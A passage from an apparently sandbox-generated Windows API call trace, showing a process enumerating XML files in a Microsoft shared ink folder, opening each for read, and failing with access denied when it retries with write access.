lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0084.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0084.610] AreFileApisANSI () returned 1 [0084.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsid.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsid.xml", lpUsedDefaultChar=0x0) returned 61 [0084.610] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0084.610] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.610] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.610] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0084.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0084.611] AreFileApisANSI () returned 1 [0084.611] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0084.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6ebe0 [0084.611] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x6ebe0, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsid.xml") returned 61 [0084.611] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsid.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsid.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x364 [0084.611] GetFileType (hFile=0x364) returned 0x1 [0084.611] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0084.611] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0084.611] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0084.612] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0084.612] CloseHandle (hObject=0x364) returned 1 [0084.613] AreFileApisANSI () returned 1 [0084.613] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0084.613] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6df20 [0084.613] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x6df20, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsid.xml") returned 61 [0084.613] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsid.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsid.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.613] GetLastError () returned 0x5 [0084.613] GetLastError () returned 0x5 [0084.613] SetLastError (dwErrCode=0x5) [0084.613] GetLastError () returned 0x5 [0084.614] SetLastError (dwErrCode=0x5) [0084.614] GetLastError () returned 0x5 [0084.614] SetLastError (dwErrCode=0x5) [0084.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0084.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0084.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0084.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0084.614] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.614] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.614] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c940eb6, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7c940eb6, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7c940eb6, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x9de, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ipsita.xml", cAlternateFileName="")) returned 1 [0084.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0084.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0084.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0084.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0084.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0084.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0084.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0084.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0084.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0084.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0084.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0084.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0084.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0084.615] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.615] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.615] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.615] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0084.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.615] AreFileApisANSI () returned 1 [0084.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsita.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsita.xml", lpUsedDefaultChar=0x0) returned 62 [0084.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0084.615] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.615] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0084.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0084.615] AreFileApisANSI () returned 1 [0084.615] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6ebe0 [0084.615] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x6ebe0, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsita.xml") returned 62 [0084.615] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsita.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x364 [0084.616] GetFileType (hFile=0x364) returned 0x1 [0084.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0084.616] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0084.616] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0084.616] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0084.617] CloseHandle (hObject=0x364) returned 1 [0084.617] AreFileApisANSI () returned 1 [0084.617] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6df20 [0084.617] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x6df20, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsita.xml") returned 62 [0084.618] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsita.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.618] GetLastError () returned 0x5 [0084.618] GetLastError () returned 0x5 [0084.618] SetLastError (dwErrCode=0x5) [0084.619] GetLastError () returned 0x5 [0084.619] SetLastError (dwErrCode=0x5) [0084.619] GetLastError () returned 0x5 [0084.619] SetLastError (dwErrCode=0x5) [0084.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0084.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0084.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0084.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0084.619] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.619] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.619] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c96711d, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7c96711d, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7c96711d, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x9da, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ipsjpn.xml", cAlternateFileName="")) returned 1 [0084.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0084.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0084.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0084.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0084.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0084.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0084.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0084.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0084.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fdc8 [0084.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0084.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e3e8 [0084.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fdc8 | out: hHeap=0x20000) returned 1 [0084.620] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.620] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.620] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.620] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0084.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.620] AreFileApisANSI () returned 1 [0084.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsjpn.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsjpn.xml", lpUsedDefaultChar=0x0) returned 62 [0084.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0084.620] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.620] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0084.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0084.620] AreFileApisANSI () returned 1 [0084.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6ec68 [0084.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x6ec68, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsjpn.xml") returned 62 [0084.620] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsjpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x364 [0084.620] GetFileType (hFile=0x364) returned 0x1 [0084.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0084.621] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0084.621] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0084.621] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0084.621] CloseHandle (hObject=0x364) returned 1 [0084.621] AreFileApisANSI () returned 1 [0084.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6eb58 [0084.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x6eb58, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsjpn.xml") returned 62 [0084.621] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsjpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.621] GetLastError () returned 0x5 [0084.621] GetLastError () returned 0x5 [0084.621] SetLastError (dwErrCode=0x5) [0084.621] GetLastError () returned 0x5 [0084.622] SetLastError (dwErrCode=0x5) [0084.622] GetLastError () returned 0x5 [0084.622] SetLastError (dwErrCode=0x5) [0084.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0084.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0084.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0084.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0084.622] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.622] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.622] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d100bae, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d100bae, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d100bae, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa08, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ipskor.xml", cAlternateFileName="")) returned 1 [0084.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0084.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0084.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0084.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0084.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0084.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0084.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0084.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0084.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0084.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0084.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0084.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e3e8 [0084.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0084.623] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.623] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.623] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.623] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0084.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.623] AreFileApisANSI () returned 1 [0084.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipskor.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common 